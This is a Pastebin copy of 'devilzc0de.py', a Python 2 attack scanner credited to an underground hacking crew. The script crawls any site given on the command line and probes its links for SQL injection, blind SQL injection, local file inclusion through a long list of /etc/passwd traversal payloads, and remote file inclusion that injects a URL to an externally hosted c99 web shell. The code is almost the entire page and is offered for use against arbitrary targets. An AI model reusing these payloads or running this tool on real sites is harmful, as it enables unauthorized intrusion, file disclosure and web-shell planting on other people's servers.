API tools faq
paste
Guest User

pentest.py

a guest
Apr 11th, 2012
1,580
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.73 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #devilzc0de.py version 1.0
  3. # "\n\n\t\tlink extract routine sipped from by lipun4u[at]gmail[dot]com link extractor"
  4. # "\t\tcoding by mywisdom ([email protected])"
  5. #modified for devilzc0de sqli,blind,rfi and lfi and path disclosure via error message against your target
  6. # Greetz : evidence@solhack, getch@solhack. foxx@solhack ... I miss you bro
  7. # Special thanks to: asit_dhal( lipun4u[at]gmail[dot]com ) who inspire me
  8. # Special thanx for d3hydr8, baltazar, rsauron,jaya sangkar, inkubus,0n3l0ve,tundergun, gblack,wendy182, zeroc0de666,and all flash crews,etc
  9. # Flash Crews(errorname,danzel,trtxx,etc...), h4cky0u members, jasakom members,hmsecurity crews and members, ex hackerzonline (sorry for ddosing)crews (pirus,cybermutaqqin,pitaqh,aurel,t0m,bunga,kiddes,idbajakan,adisatwa,adioranye,flyv66,meong,etc)
  10. # Special thanks to my special foo : aibo,alabala -> my real foo they always blame me..thank you :-)
  11. # and to all darkc0de members
  12. #greetz to solhack crews 2004,leader: evidence@sdf,crews:getch@solhack,mywisdom@solhack and foxx@solhack
  13. # Special thanks to Jasakom Members and Crews (sto,pirus,pitaqh,aurel666,tomahawk,kiddies,sat,flyv666,petimati,ketek,
  14. # This tool is best combined with flashjumper.py
  15. #greetz to gdc community (bl4ck3ng1ne,blok_undergound,xnome,cr4wl3r,mr saint,etc...)
  16. ###############################################################################
  17. # // ) )
  18. # __//__ // ___ ___ / __ ___ __ ___
  19. # // // // ) ) (( ) ) // ) ) ____ // ) ) // ) ) //___) ) // / / / /
  20. # // // // / / \ \ // / / // // // // / / / /
  21. #// // ((___( ( // ) ) // / / ((____ // ((____ ((__( (__/ /
  22. ##############################################################################
  23.  
  24. ################################################################
  25. # .___ __ _______ .___ #
  26. # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
  27. # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
  28. # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
  29. # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
  30. # \/ \/ \/ #
  31. # ___________ ______ _ __ #
  32. # _/ ___\_ __ \_/ __ \ \/ \/ / #
  33. # \ \___| | \/\ ___/\ / #
  34. # \___ >__| \___ >\/\_/ #
  35. # est.2007 \/ \/ forum.darkc0de.com #
  36. ##############################################################################
  37.  
  38. import urllib,sys,os,sgmllib
  39. rfi=""
  40. myroot="root:x:"
  41. anjing="c99shell"
  42. cekrfi="http://xoomer.virgilio.it/divulgar/c99.txt?"
  43. lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
  44. pathdisclosure1="/home/"
  45. pathdisclosure2="/var/"
  46. pathdisclosure3="/www/"
  47. pathdisclosure4="/html/"
  48. pathdisclosure5="/usr/"
  49. pathdisclosure6="/user/"
  50. pathdisclosure7="/sites/"
  51. pathdisclosure8="/mnt"
  52. pathdisclosure9="/etc/"
  53. pathdisclosure10="/web/"
  54. penghubung=" in "
  55. gajebo="failed to open"
  56. l2="http://www.googlebig.com/"
  57. cachesqli="-"
  58. cacheblind1="-"
  59. cacheblind100="-"
  60. log = "flashjumperlog.txt"
  61. tanya="?"
  62. samadengan="="
  63. appname = os.path.basename(sys.argv[0])
  64. ceksqli="'"
  65. slash="/"
  66. cekblind1="+order+by+1--"
  67. cekblind100="+order+by+300--"
  68. mysqli1="You have an error in your SQL"
  69. mysqli2="Division by zero in"
  70. mysqli3="supplied argument is not a valid MySQL result resource in"
  71. mysqli4="Call to a member function"
  72. accesqli1="Microsoft JET Database"
  73. accesqli2="ODBC Microsoft Access Driver"
  74. mssqli1="Microsoft OLE DB Provider for SQL Server"
  75. mssqli2="Unclosed quotation mark"
  76. oracle="Microsoft OLE DB Provider for Oracle"
  77. mscfm="[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect"
  78. general="Incorrect syntax near"
  79. mywisdom="http://"
  80. sat_ahyar="=1"
  81. sat_ahyar=str(sat_ahyar)
  82.  
  83. class MyParser(sgmllib.SGMLParser):
  84. "A simple parser class."
  85.  
  86. def parse(self, s):
  87. "Parse the given string 's'."
  88. self.feed(s)
  89. self.close()
  90.  
  91. def __init__(self, verbose=0):
  92. "Initialise an object, passing 'verbose' to the superclass."
  93.  
  94. sgmllib.SGMLParser.__init__(self, verbose)
  95. self.hyperlinks = []
  96.  
  97. def start_a(self, attributes):
  98. "Process a hyperlink and its 'attributes'."
  99.  
  100. for name, value in attributes:
  101. if name == "href":
  102. self.hyperlinks.append(value)
  103. if name == "src":
  104. self.hyperlinks.append(value)
  105.  
  106. def get_hyperlinks(self):
  107. "Return the list of hyperlinks."
  108.  
  109. return self.hyperlinks
  110.  
  111.  
  112.  
  113. if len(sys.argv) <=1:
  114. print "Usage : " + appname + " -mode <url> "
  115. print "e.g. : " + appname + " -sqli www.google.com "
  116. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  117. sys.exit(1)
  118. elif "-h" in sys.argv:
  119. print "Usage : " + appname + " -mode <url> "
  120. print "e.g. : " + appname + " -sqli www.google.com "
  121. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  122. sys.exit(1)
  123. elif "--help" in sys.argv:
  124. print "Usage : " + appname + "-mode <url> "
  125. print "e.g. : " + appname + " -sqli www.google.com "
  126. print "Sample mode: -sqli ,-blind, -lfi, -rfi"
  127. sys.exit(1)
  128.  
  129. site = sys.argv[2].replace("http://","")
  130. site = "http://" + site.lower()
  131.  
  132. mode=sys.argv[1]
  133. try:
  134. site_data = urllib.urlopen(site)
  135. parser = MyParser()
  136. parser.parse(site_data.read())
  137. except(IOError),msg:
  138. print "Error in connecting site ", site
  139. print msg
  140. sys.exit(1)
  141. links = parser.get_hyperlinks()
  142. print ""
  143. print "***********************************"
  144. print "Devilzc0de.py version 1.0"
  145. print "by:mywisdom (mywisdom[at]jasakom[dot]org"
  146. print "searching sqli,blind,rfi and lfi and search path disclosure at your target"
  147. print "***********************************"
  148. print "Every w00t message will be logged at flashjumperlog.txt,check the log after scanning finished"
  149. l2=site
  150. urlbuta=site+slash
  151. url_rfi_basic=site+slash
  152. url_lfi_basic=site+slash
  153. z=0
  154. data=""
  155. x=0
  156. for l in links:
  157. z=z+1
  158. if z>50:
  159. sys.exit(1)
  160. if mode=='-sqli':
  161. z=z+1
  162. if z>50:
  163. sys.exit(1)
  164. htmlsqli=""
  165. nemu="no"
  166. tipe=""
  167.  
  168. if samadengan in l and tanya in l:
  169. if mywisdom not in l:
  170. l2=l+ceksqli
  171. if site not in l2:
  172. l2=site+slash+l2
  173.  
  174. else :
  175. if site in l:
  176. l2=l+ceksqli
  177. print "[-]Checking sqli at:"+l2
  178. response=urllib.urlopen(l2)
  179. htmlsqli = response.read()
  180.  
  181. if mysqli1 in htmlsqli:
  182. nemu="yes"
  183. tipe="mysql injection"
  184. elif mysqli2 in htmlsqli:
  185. nemu="yes"
  186. tipe="mysql injection"
  187. elif mysqli3 in htmlsqli:
  188. nemu="yes"
  189. tipe="mysql injection (error fetching array)"
  190. elif mysqli4 in htmlsqli:
  191. nemu="yes"
  192. tipe="oop application bug"
  193.  
  194. elif accesqli1 in htmlsqli:
  195. nemu="yes"
  196. tipe="ms access sql injection"
  197.  
  198. elif accesqli2 in htmlsqli:
  199. nemu="yes"
  200. tipe="ms access sql injection"
  201.  
  202. elif mssqli1 in htmlsqli:
  203. nemu="yes"
  204. tipe="mssql injection"
  205.  
  206. elif mssqli2 in htmlsqli:
  207. nemu="yes"
  208. tipe="mssql injection"
  209.  
  210. elif oracle in htmlsqli:
  211. nemu="yes"
  212. tipe="oracle sql injection"
  213.  
  214. elif mscfm in htmlsqli:
  215. nemu="yes"
  216. tipe="cfm mssql injection"
  217.  
  218. elif general in htmlsqli:
  219. nemu="yes"
  220. tipe="unidentified sql injection"
  221.  
  222. if nemu=='yes':
  223. print "[+]W00t !! Found "+ tipe+ " Bug at:"+l2
  224. print "[+]Possible server's hole saved at flashjumperlog.txt"
  225. filelog = open(log, "a")
  226. filelog.write ("\n[+]W00t !! Found "+ tipe+ " Bug at:"+l2)
  227. #tes path disclosure
  228. tahap2=l2.split('=')
  229. lx=tahap2[0]+sat_ahyar+ceksqli
  230. if tanya in lx and z<3:
  231. print "[--]checking error request at:"+lx
  232. response=urllib.urlopen(lx)
  233. htmlsqli = response.read()
  234.  
  235. if mysqli1 in htmlsqli:
  236. nemu="yes"
  237. tipe="mysql injection"
  238. elif mysqli2 in htmlsqli:
  239. nemu="yes"
  240. tipe="mysql injection"
  241.  
  242. elif accesqli1 in htmlsqli:
  243. nemu="yes"
  244. tipe="ms access sql injection"
  245.  
  246. elif accesqli2 in htmlsqli:
  247. nemu="yes"
  248. tipe="ms access sql injection"
  249.  
  250. elif mssqli1 in htmlsqli:
  251. nemu="yes"
  252. tipe="mssql injection"
  253.  
  254. elif mssqli2 in htmlsqli:
  255. nemu="yes"
  256. tipe="mssql injection"
  257.  
  258. elif oracle in htmlsqli:
  259. nemu="yes"
  260. tipe="oracle sql injection"
  261.  
  262. elif mscfm in htmlsqli:
  263. nemu="yes"
  264. tipe="cfm mssql injection"
  265.  
  266. elif general in htmlsqli:
  267. nemu="yes"
  268. tipe="unidentified sql injection"
  269.  
  270. elif gajebo in htmlsqli:
  271. nemu="yes"
  272. tipe="unidentified error message"
  273.  
  274. elif pathdisclosure1 in htmlsqli and penghubung in htmlsqli:
  275. nemu="yes"
  276. tipe="path discosure /home/"
  277. elif pathdisclosure2 in htmlsqli and penghubung in htmlsqli:
  278. nemu="yes"
  279. tipe="path disclosure /var/"
  280. elif pathdisclosure3 in htmlsqli and penghubung in htmlsqli:
  281. nemu="yes"
  282. tipe="path disclosure /www/"
  283. elif pathdisclosure4 in htmlsqli and penghubung in htmlsqli:
  284. nemu="yes"
  285. tipe="path disclosure /html/"
  286. elif pathdisclosure5 in htmlsqli and penghubung in htmlsqli:
  287. nemu="yes"
  288. tipe="path disclosure /usr/"
  289. elif pathdisclosure6 in htmlsqli and penghubung in htmlsqli:
  290. nemu="yes"
  291. tipe="path disclosure /user/"
  292. elif pathdisclosure7 in htmlsqli and penghubung in htmlsqli:
  293. nemu="yes"
  294. tipe="path disclosure /sites/"
  295. elif pathdisclosure8 in htmlsqli and penghubung in htmlsqli:
  296. nemu="yes"
  297. tipe="path disclosure /mnt/"
  298. elif pathdisclosure9 in htmlsqli and penghubung in htmlsqli:
  299. nemu="yes"
  300. tipe="path disclosure /etc/"
  301. elif pathdisclosure10 in htmlsqli and penghubung in htmlsqli:
  302. nemu="yes"
  303. tipe="path disclosure /web/"
  304.  
  305.  
  306.  
  307. if nemu=='yes':
  308. print "[+]W00t !! Found "+ tipe+ " Bug at:"+lx
  309. print "[+]Possible server's hole saved at flashjumperlog.txt"
  310. filelog = open(log, "a")
  311. filelog.write ("\n[+]W00t !! Found "+ tipe+ " Bug at:"+lx)
  312.  
  313.  
  314. elif mode=='-blind':
  315. z=z+1
  316. if z>50:
  317. sys.exit(1)
  318. nemu="no"
  319. l1=urlbuta
  320. l100=urlbuta
  321. if samadengan in l:
  322. if mywisdom not in l:
  323. l1=l+cekblind1
  324. if site not in l1:
  325. l1=site+slash+l1
  326. l100=l+cekblind100
  327. if site not in l100:
  328. l100=site+slash+l100
  329. else :
  330. if site in l:
  331. l1=l+cekblind1
  332. l100=l+cekblind100
  333. print "[-]Saving response length for blind sqli at :"+l1
  334. response=urllib.urlopen(l1)
  335. cacheblind1 = response.read()
  336. print "[-]Saving response length for blind sqli at :"+l100
  337. response=urllib.urlopen(l100)
  338. cacheblind100 = response.read()
  339. panjangblind1=len(cacheblind1)
  340. panjangblind100=len(cacheblind100)
  341. if panjangblind1!=panjangblind100:
  342. print "[+]W00t !! Found Possible Blind sqli Bug at:"+l100
  343. print "[+]Possible server's hole saved at flashjumperlog.txt"
  344. filelog = open(log, "a")
  345. filelog.write ("\n[+]W00t !! Found Possible Blind sqli Bug at:"+l100)
  346. else:
  347. print "[-]Sorry no possible blind found here !"
  348.  
  349.  
  350.  
  351.  
  352. elif mode=='-lfi':
  353. z=z+1
  354. if z>50:
  355. sys.exit(1)
  356. for ceklfi in lfis:
  357. htmllfi="alabala ngentot akun darkc0denya udah gw 0wned hahahaha"
  358.  
  359. if samadengan in l:
  360. if mywisdom not in l:
  361. beforelfi=l.split('=')
  362. pj=len(beforelfi)
  363. da=0
  364. kont=""
  365. for x in beforelfi:
  366. da=da+1
  367. if da<pj:
  368. kont=kont+x+"="
  369.  
  370. lfi=kont+ceklfi
  371. if site not in lfi:
  372. lfi=site+slash+lfi
  373.  
  374. else :
  375. if site in l:
  376.  
  377.  
  378. beforelfi=l.split('=')
  379. pj=len(beforelfi)
  380. da=0
  381. kont=""
  382. for x in beforelfi:
  383. da=da+1
  384. if da<pj:
  385. kont=kont+x+"="
  386. lfi=kont+ceklfi
  387. if lfi!="":
  388. print "[-]Checking lfi at:"+lfi
  389. try:
  390. response=urllib.urlopen(lfi)
  391. htmllfi = response.read()
  392. except(IOError),msg:
  393. print "Error in testing url: ", lfi
  394. print msg
  395. if myroot in htmllfi:
  396. print "[+]W00t !! Found lfi Bug at:"+lfi
  397. print "[+]Possible server's hole saved at flashjumperlog.txt"
  398. filelog = open(log, "a")
  399. filelog.write ("\n[+]W00t !! Found lfi Bug at:"+lfi)
  400. if samadengan in l:
  401. if mywisdom not in l:
  402. lfi=l
  403. if site not in lfi:
  404. lfi=site+slash+lfi
  405.  
  406. else :
  407. if site in l:
  408. lfi=l
  409.  
  410. tahap3=lfi.split('=')
  411. lfix=tahap3[0]+samadengan+ceklfi
  412. if tanya in lfix:
  413. print "[--]checking lfi at:"+lfix
  414.  
  415. try:
  416. response=urllib.urlopen(lfix)
  417. htmllfi = response.read()
  418. except(IOError),msg:
  419. print "Error in testing url: ", lfix
  420. print msg
  421.  
  422. if myroot in htmllfi:
  423. print "[+]W00t !! Found lfi Bug at:"+lfix
  424. print "[+]Possible server's hole saved at flashjumperlog.txt"
  425. filelog = open(log, "a")
  426. filelog.write ("\n[+]W00t !! Found lfi Bug at:"+lfix)
  427.  
  428.  
  429. elif mode=='-rfi':
  430. z=z+1
  431. if z>50:
  432. sys.exit(1)
  433. htmlrfi="alabala ngentot akun darkc0denya udah gw 0wned hahahaha"
  434. if samadengan in l:
  435. if mywisdom not in l:
  436. beforerfi=l.split('=')
  437. pj=len(beforerfi)
  438. da=0
  439. kont=""
  440. for x in beforerfi:
  441. da=da+1
  442. if da<pj:
  443. kont=kont+x+"="
  444.  
  445. rfi=kont+cekrfi
  446. if site not in rfi:
  447. rfi=site+slash+rfi
  448.  
  449. else :
  450. if site in l:
  451.  
  452.  
  453. beforerfi=l.split('=')
  454. pj=len(beforerfi)
  455. da=0
  456. kont=""
  457. for x in beforerfi:
  458. da=da+1
  459. if da<pj:
  460. kont=kont+x+"="
  461. rfi=kont+cekrfi
  462. if rfi!="":
  463. print "[-]Checking rfi at:"+rfi
  464. try:
  465. response=urllib.urlopen(rfi)
  466. htmlrfi = response.read()
  467. except(IOError),msg:
  468. print "Error in testing url: ", rfi
  469. print msg
  470. if anjing in htmlrfi:
  471. print "[+]W00t !! Found rfi Bug at:"+rfi
  472. print "[+]Possible server's hole saved at flashjumperlog.txt"
  473. filelog = open(log, "a")
  474. filelog.write ("\n[+]W00t !! Found rfi Bug at:"+rfi)
  475.  
  476. if samadengan in l:
  477. if mywisdom not in l:
  478. rfi=l
  479. if site not in rfi:
  480. rfi=site+slash+rfi
  481.  
  482. else :
  483. if site in l:
  484. rfi=l
  485.  
  486. tahap3=rfi.split('=')
  487. rfix=tahap3[0]+samadengan+cekrfi
  488. if tanya in rfix:
  489. print "[--]checking rfi at:"+rfix
  490.  
  491. try:
  492. response=urllib.urlopen(rfix)
  493. htmlrfi = response.read()
  494. except(IOError),msg:
  495. print "Error in testing url: ", rfix
  496. print msg
  497.  
  498. if anjing in htmlrfi:
  499. print "[+]W00t !! Found rfi Bug at:"+rfix
  500. print "[+]Possible server's hole saved at flashjumperlog.txt"
  501. filelog = open(log, "a")
  502. filelog.write ("\n[+]W00t !! Found rfi Bug at:"+rfix)
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!